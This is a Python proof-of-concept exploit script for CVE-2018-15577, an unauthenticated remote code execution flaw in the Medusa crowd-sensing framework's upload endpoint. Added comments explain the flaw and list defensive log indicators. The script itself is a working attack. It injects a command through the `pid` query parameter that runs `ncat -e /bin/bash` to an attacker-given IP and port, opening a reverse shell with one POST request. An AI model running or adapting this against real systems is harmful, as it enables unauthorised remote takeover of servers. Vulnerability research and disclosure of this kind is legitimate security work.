Unauthenticated RCE - Medusa Crowd-Sensing Framework
#!/usr/bin/python | |
''' | |
# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE | |
# Date: 16/08/2018 | |
# Exploit Author: Askar (@mohammadaskar2) | |
# CVE : CVE-2018-15577 - RESERVED | |
# Vendor Homepage: https://github.com/USC-NSL/Medusa/ | |
# Version: V1.0 | |
# Tested on: Ubuntu 16.04 / PHP 7.0.28 | |
''' | |
import requests | |
import sys | |
import os | |
# Proof-of-concept driver for the issue named in the header (CVE-2018-15577).
# It takes exactly three command-line arguments (target URL, listener IP,
# listener port) and prints a usage line and exits otherwise.
# NOTE(review): this is Python 2 syntax (print statement), and the page
# extraction dropped the indentation of the two lines under the `if`.
if len(sys.argv) != 4: | |
print "[+] Usage : ./exploit.py url local_ip local_port" | |
sys.exit(0) | |
url = sys.argv[1] | |
ip = sys.argv[2] | |
port = sys.argv[3] | |
# The flaw is visible in this query string: the `pid` parameter carries a shell
# pipe, a command, and a URL-encoded `#` (%23) that comments out whatever the
# server appends afterwards. Presumably web_tt_upload.php interpolates `pid`
# into a shell command without validation -- the server-side code is not shown
# on this page, so confirm against the vendor source.
# Defender notes: constrain `pid` to the exact format the application expects,
# never build shell commands from request parameters, and require
# authentication on the upload endpoint. In web access logs, a `pid` value
# containing `|`, encoded spaces (%20) or `%23` is a strong indicator of an
# attempt; so are unexpected child processes or outbound connections started
# by the web server account.
payload = "?pid=| ncat%20-e%20%2Fbin%2Fbash%20{0}%20{1}%20%23".format(ip, port) | |
full_url = url + payload | |
# The request is a multipart upload, so a small placeholder file is written to
# /tmp to fill the `uploadedfile` form field; its content is irrelevant.
os.system("echo 111 > /tmp/medusa-exploit.txt") | |
# NOTE(review): the file handle opened here is never closed.
files = {'uploadedfile': open("/tmp/medusa-exploit.txt", "rb")} | |
print "[+]Sending Payload , check your shell !" | |
# A single unauthenticated POST: no session, cookie or token is sent, which is
# why the header classifies the issue as unauthenticated.
requests.post(full_url, files=files) | |
# Delete the placeholder file created above.
os.system("rm /tmp/medusa-exploit.txt") | |
print "[+]Temp file removed !" |